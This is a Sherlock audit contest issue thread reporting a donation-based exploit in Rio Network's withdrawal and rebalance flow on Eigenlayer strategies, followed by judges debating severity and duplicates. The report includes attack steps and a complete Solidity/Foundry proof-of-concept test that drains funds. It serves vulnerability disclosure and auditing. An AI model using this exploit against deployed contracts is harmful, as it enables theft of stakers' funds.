### ISSUE TITLE
zzykxx - It's possible to steal funds via donations to Eigenlayer strategies

### ISSUE THREAD

**Issue by sherlock-admin** [sherlock-audit/2024-02-rio-network-core-protocol-judging#112]
zzykxx

high

# It's possible to steal funds via donations to Eigenlayer strategies

## Summary
It's possible to steal funds from the protocol by donating assets an Eigenlayer strategy.

## Vulnerability Detail
When requesting a withdrawal for an asset via [RioLRTCoordinator::requestWithdrawal()](https://github.com/sherlock-audit/2024-02-rio-network-core-protocol/blob/main/rio-sherlock-audit/contracts/restaking/RioLRTCoordinator.sol#L99) the protocol calculates the amount of shares owed to the caller based on:
1. The amount of `LRTTokens` that are being withdrawn
2. The current conversion rate of the asset Eigenlayer strategy via [IStrategy(strategy).underlyingToSharesView()](https://github.com/sherlock-audit/2024-02-rio-network-core-protocol/blob/main/rio-sherlock-audit/contracts/restaking/RioLRTAssetRegistry.sol#L220)

Then the withdrawal gets queued and the amount of shares owed cached by the protocol, we will call this `sharesOwed`.

The next step o complete the withdrawal is to call [RioLRTCoordinator::rebalance()](https://github.com/sherlock-audit/2024-02-rio-network-core-protocol/blob/main/rio-sherlock-audit/contracts/restaking/RioLRTCoordinator.sol#L121) where the protocol retrieves the `sharesOwed` for the epoch and converts the value back to assets via the current conversion rate of the asset Eigenlayer strategy via [IStrategy(strategy).sharesToUnderlyingView()](https://github.com/sherlock-audit/2024-02-rio-network-core-protocol/blob/main/rio-sherlock-audit/contracts/restaking/RioLRTAssetRegistry.sol#L230).

It's possible to extract value by donating tokens to the Eigenlayer strategy after [RioLRTCoordinator::requestWithdrawal()](https://github.com/sherlock-audit/2024-02-rio-network-core-protocol/blob/main/rio-sherlock-audit/contracts/restaking/RioLRTCoordinator.sol#L99) is called, but before [RioLRTCoordinator::rebalance()](https://github.com/sherlock-audit/2024-02-rio-network-core-protocol/blob/main/rio-sherlock-audit/contracts/restaking/RioLRTCoordinator.sol#L121). This works because when [RioLRTCoordinator::requestWithdrawal()](https://github.com/sherlock-audit/2024-02-rio-network-core-protocol/blob/main/rio-sherlock-audit/contracts/restaking/RioLRTCoordinator.sol#L99) is called the amount of shares owed is cached based on the current conversion rate of the strategy and when [RioLRTCoordinator::rebalance()](https://github.com/sherlock-audit/2024-02-rio-network-core-protocol/blob/main/rio-sherlock-audit/contracts/restaking/RioLRTCoordinator.sol#L121) is called, and the amount of shares owed converted back, those same shares will be worth more.

This attack is profitable when the increase in value of `sharesOwed` after the donation is bigger than the donation itself, which is possible because `sharesOwed` isn't necessarily deposited in the strategy and can just be the value expressed in shares of the amount of assets held in the deposit pool. As an extreme and simplified example, the Eigenlayer strategy can have 0 total shares minted but if the deposit pool contains `100e18` unit of asset it will be valued (assuming 1:1) at `100e18` shares. If then requested for withdrawal the `sharesOwed` parameter will be set at `100e18`. 

### POC
1. An LRT with 1 asset, `rETH`, has 100e18 rETH of deposits.
2. A new asset, `cbETH`, is added to the LRT. The Eigenlayer strategy of `cbETH` only has 1e18 `cbETH` staked.
3. An attacker deposits 100e18 `cbETH` in the LRT, receiving `LRTtokens`.
4. The attacker requests two withdrawals, half of his `LRTTokens` to withdraw `cbETH` and the other half to withdraw `rETH`.
5. The attacker transfers 1e18 `cbETH` to the Eigenlayer strategy directly. This doubles the value of each share.
6. Rebalance on `cbETH` is called, but because the share price is doubled all of the funds initially deposited by the attacker are withdrawn even if only half of the `LRTTokens` were used. The attacker recovered his initial deposit.
7. Rebalance on `rETH` is called and the other half of `LRTTokens` is used to withdraw `rETH`.

Copy-paste in `RioLRTCoordinator.t.sol`:

```solidity
function test_drainLiquidityViaDonation() public {
    //-> Setup
    address attacker = makeAddr("attacker");
    address previousLRTDepositors = makeAddr("previousLRTDepositors");
    address strategyStakers = makeAddr("strategyStakers");
    deal(CBETH_ADDRESS, attacker, 101e18);
    deal(RETH_ADDRESS, previousLRTDepositors, 100e18);
    deal(CBETH_ADDRESS, strategyStakers, 100e18);
    vm.startPrank(attacker);
    cbETH.approve(address(reLST.coordinator), type(uint256).max);
    cbETH.approve(address(CBETH_STRATEGY), type(uint256).max);
    cbETH.approve(address(strategyManager), type(uint256).max);
    reLST.token.approve(address(reLST.coordinator), type(uint256).max);
    vm.stopPrank();
    vm.startPrank(previousLRTDepositors);
    rETH.approve(address(reLST.coordinator), type(uint256).max);
    rETH.approve(address(strategyManager), type(uint256).max);
    reLST.token.approve(address(reLST.coordinator), type(uint256).max);
    vm.stopPrank();

    //-> The LRT has 100e18 rETH of liquidity
    vm.prank(previousLRTDepositors);
    reLST.coordinator.deposit(RETH_ADDRESS, 100e18);

    //-> The cbETH strategy of EigenLayer has 1e18 cbETH of liquidity
    vm.startPrank(strategyStakers);
    cbETH.approve(address(strategyManager), type(uint256).max);
    strategyManager.depositIntoStrategy(address(CBETH_STRATEGY), CBETH_ADDRESS, 1e18);
    vm.stopPrank();
    
    //->Cache starting balances of Alice
    uint256 attackerInitialcbETHBalance = cbETH.balanceOf(attacker);
    uint256 attackerInitialrETHBalance = rETH.balanceOf(attacker);

    //-> Alice deposits 100e18 cbETH
    vm.prank(attacker);
    reLST.coordinator.deposit(CBETH_ADDRESS, 100e18);

    //-> Alice requests two withdrawals:
    //  1. Withdraw cbETH with half of his LRTTokens
    //  2. Withdraw rETH with the other half
    vm.startPrank(attacker);
    reLST.coordinator.requestWithdrawal(CBETH_ADDRESS, reLST.token.balanceOf(attacker)/2);
    reLST.coordinator.requestWithdrawal(RETH_ADDRESS, reLST.token.balanceOf(attacker));
    vm.stopPrank();
    
    //-> Alice donates 1e18 cbETH to the Eigenlayer strategy directly, because the strategy already has 1e18
    //cbETH in liquidity adding an extra 1e18 will double the value
    vm.prank(attacker);
    cbETH.transfer(address(CBETH_STRATEGY), 1e18);

    //-> Rebalance is called on for both the cbETH and rETH assets
    skip(reLST.coordinator.rebalanceDelay());
    vm.startPrank(EOA, EOA);
    reLST.coordinator.rebalance(CBETH_ADDRESS);
    reLST.coordinator.rebalance(RETH_ADDRESS);
    vm.stopPrank();

    //-> Alice completes her withdrawals
    //  1. All of the 100e18 cbETH she initially deposited are withdrawn by using only half of her LRTTokens, because we doubled the shares value
    //  2. ~48e18 rETH are withdrawn using the other half of her LRTTokens
    vm.startPrank(attacker);
    reLST.withdrawalQueue.claimWithdrawalsForEpoch(IRioLRTWithdrawalQueue.ClaimRequest({asset: CBETH_ADDRESS, epoch: 0}));
    reLST.withdrawalQueue.claimWithdrawalsForEpoch(IRioLRTWithdrawalQueue.ClaimRequest({asset: RETH_ADDRESS, epoch: 0}));
    vm.stopPrank();

    //-> Alice profited
    uint256 CBETH_TO_ETH = 1.0555 ether; //setted in setup
    uint256 RETH_TO_ETH = 1.0961 ether; //setted in setup
    uint256 attackerFinalcbETHBalance = cbETH.balanceOf(attacker);
    uint256 attackerFinalrETHBalance = rETH.balanceOf(attacker);
    uint256 attackerInitialValueInETH = attackerInitialcbETHBalance * CBETH_TO_ETH / 1e18 + attackerInitialrETHBalance * RETH_TO_ETH / 1e18;
    uint256 attackerFinalBalanceInETH = attackerFinalcbETHBalance * CBETH_TO_ETH / 1e18 + attackerFinalrETHBalance * RETH_TO_ETH / 1e18;

    assertGt(attackerFinalBalanceInETH, attackerInitialValueInETH);
}
```
## Impact
Funds can be stolen from stakers.

## Tool used

Manual Review

## Recommendation
Maybe I'm missing something but a fix for this doesn't seem trivial, maybe the idea to deposit the assets into the strategies immediately should be taken in considered.

Duplicate of #109

**Comment by zzykxx** [comment]
Escalate

I think this has been overlooked, not a duplicate of #52. This exploit allows to steal funds by donating tokens to Eigenlayer strategies directly and is not about stealing rewards.

Edit: Just noticed the issue has been classified as medium severity, what's the reasoning behind this choice?

**Comment by sherlock-admin2** [comment]
> Escalate
> 
> I think this has been overlooked, not a duplicate of #52. This exploit allows to steal funds by donating tokens to Eigenlayer strategies directly and is not about stealing rewards.
> 
> Edit: Just noticed the issue has been classified as medium severity, what's the reasoning behind this choice?
> 

You've created a valid escalation!

To remove the escalation from consideration: Delete your comment.

You may delete or edit your escalation comment anytime before the 48-hour escalation window closes. After that, the escalation becomes final.

**Comment by nevillehuang** [comment]
@solimander Could you take a look? This seems like a duplicate of #386 and #154

**Comment by zzykxx** [comment]
This issue exploits the fact that the protocol prices assets in terms of Eigenlayer strategy shares even when those assets aren't yet deposited in an Eigenlayer strategy.

It's not related to either #386 or #154 and should be classified as high severity because it allows direct theft of funds.

**Comment by solimander** [comment]
@nevillehuang This looks valid. In practice, the donation should always be larger than the possible increase in shares, but I am considering mitigations.

**Comment by nevillehuang** [comment]
I will need some time to review and check duplicates, but on first look, inclined to think this is a separate issue.

**Comment by zzykxx** [comment]
@nevillehuang I'm starting to think this might be a duplicate of #109. Report #147 does a good job at describing the issue.

There is a problem tho, the Eigenlayer strategies of the targeted Eigenlayer version never increase in value "naturally". If this is actually the case (I'm 99% sure) I think all the issues that don't mention a donation to the strategies directly should be invalidated.

**Comment by nevillehuang** [comment]
@zzykxx I agree, I will review all duplicates of #109 and this issue #112 and come back to this with a more appropriate family tree here.

**Comment by nevillehuang** [comment]
I think this could be a possible family tree

#109
#110
#147
#243
#370 - Could be separate issue

**Comment by Czar102** [comment]
…and #112 as a primary issue, I assume?

@solimander @hash @zzykxx can you double check?

**Comment by nevillehuang** [comment]
@zzykxx 

Does the following family tree look correct?

## finding-exchange-rate-change-donation

Increase in exchange rate between requested withdrawals due to deposits/donations causing rebalance reverts. #112 Highlights the greatest possible imapct of this root cause of share appreciation to extract value

#109
#112 - best
#147 

## finding-available-shares-pending-withdrawal

The `availableShares` for withdrawals does not take into account previously queued withdrawals, meaning more shares would be indicated to be allowed to be withdrawn. This causes a potential revert when the sanity check of `sharesOwed` is greater than `availableShares` [here](https://github.com/sherlock-audit/2024-02-rio-network-core-protocol/blob/4f01e065c1ed346875cf5b05d2b43e0bcdb4c849/rio-sherlock-audit/contracts/restaking/RioLRTCoordinator.sol#L111-L114)

#110
#132
#208
#215
#242
#243
#250
#275 
#325
#354 
#361 - best
#366
#376

## Other
#314 - Duplicate of #386

**Comment by zzykxx** [comment]
@nevillehuang I can confirm #147 and #109 both mention a donation at some point. Unfortunately at the moment I don't have time to check all the others. 

Also, #110 should be grouped with "finding-available-shares-pending-withdrawal" and I think #147 is the better report.

**Comment by Czar102** [comment]
@zzykxx can you check the above updated deduplication proposal?
@solimander do you also agree with it?

I'm planning to accept the escalation and apply the deduplication as proposed.

**Comment by zzykxx** [comment]
> @zzykxx can you check the above updated deduplication proposal? @solimander do you also agree with it?
> 
> I'm planning to accept the escalation and apply the deduplication as proposed.

I checked that #109, #112 and #147 all mention a donation and the findings in the other group don't.

**Comment by nevillehuang** [comment]
@zzykxx the others seems like a separate group of issues.

**Comment by solimander** [comment]
> @solimander do you also agree with it?

@Czar102 Yes, I do.

**Comment by Czar102** [comment]
An update: It seems #314 got lost in the list above, so @nevillehuang is making sure that the judgment of that issue will be correct.

**Comment by kennedy1030** [comment]
Please check again #242, #243. They should be seperated in other groups. 
#243 should be included in the same group with #112. Not dup of #109.

**Comment by nevillehuang** [comment]
@kennedy1030 will double check

**Comment by nevillehuang** [comment]
@Czar102 @zzykxx @kennedy1030 Updated the list above as seen [here](https://github.com/sherlock-audit/2024-02-rio-network-core-protocol-judging/issues/112#issuecomment-2037018563), let me know if you agree.

**Comment by kennedy1030** [comment]
@nevillehuang Yes, I do.

**Comment by zzykxx** [comment]
Please take in consideration that grouping issues in this contest was a nightmare for me and I might be wrong, but because it was specifically requested to me by @nevillehuang here's my opinion:

- I think [#314](https://github.com/sherlock-audit/2024-02-rio-network-core-protocol-judging/issues/314) is a duplicate of [#386](https://github.com/sherlock-audit/2024-02-rio-network-core-protocol-judging/issues/386). It never mentions a donation to an Eignelayer strategy, nor it mentions a possible increase/decrease in value of shares. Instead it talks about increase and decrease in value of LST (cbETH, rETH) that can be arbitraged as explained in [#386](https://github.com/sherlock-audit/2024-02-rio-network-core-protocol-judging/issues/386).

- [#243](https://github.com/sherlock-audit/2024-02-rio-network-core-protocol-judging/issues/243) states the the exchange rate of shares could change between `requestWithdrawal()` and `rebalance()`. This is not possible in the Eigenlayer version targeted during the audit because strategies for LST don't earn rewards and can't be slashed, which means the tokens per share ratio is constant unless an attacker purposefully donates funds to the Eigenlayer strategy as I mention in [#112](https://github.com/sherlock-audit/2024-02-rio-network-core-protocol-judging/issues/112). Because of this I think this is a duplicate of [#361](https://github.com/sherlock-audit/2024-02-rio-network-core-protocol-judging/issues/361).

**Comment by nevillehuang** [comment]
@zzykxx I agree with your analysis, and have edited my duplication [here](https://github.com/sherlock-audit/2024-02-rio-network-core-protocol-judging/issues/112#issuecomment-2037018563)

Edit:

I believe #243 to be invalid as although it correctly highlighted the potential impact of #109 wherein the exchange rate could be inflated after requesting withdrawals, but unfortunately the cause is wrongly described (does not mention a donation). I think invalidation is more appropriate. Based on @zzykxx comments [here](https://github.com/sherlock-audit/2024-02-rio-network-core-protocol-judging/issues/112#issuecomment-2046913688), exchange rate can never change unless a donation is initiated.

**Comment by kennedy1030** [comment]
@zzykxx @nevillehuang 
I agree that I did not mention donations. However, I believe that donation is one of the factors. Are you certain that donation is the only reason for changes in the exchange rate? Perhaps rounding errors could also cause minor fluctuations in the exchange rate. Even if donations are the sole factor affecting the exchange rate, I believe this issue should be considered valid. Because I think that the main point of this issue is the time delay, not donation. It is not difficult to find that donation can change exchange rate. Invalidating this issue only because of not mentioning donation is unfair.
I fail to understand why this issue should be grouped together with #361. They are entirely distinct from each other.

**Comment by kennedy1030** [comment]
And I thought that the main point of this issue is the time delay, not donation. Invalidating this issue only because of not mentioning donation is unfair.

**Comment by Czar102** [comment]
Applying the proposed deduplication. @kennedy1030 it sounds like you are not assured of the details of the exploit, but since there has been no escalation on #243, I will leave it a duplicate grouped together with #242. This will not impact the reward distribution vs. invalidating #243.

**Comment by kennedy1030** [comment]
But I still believe that #243 should be valid. It pointed out the main point of the issue.

**Comment by Czar102** [comment]
Result:
High
Duplicate of #109

Even though this issue has greater impact than #109 not to change the primary report.

**Comment by sherlock-admin3** [comment]
Escalations have been resolved successfully!

Escalation status:
- [zzykxx](https://github.com/sherlock-audit/2024-02-rio-network-core-protocol-judging/issues/112/#issuecomment-2023083055): accepted
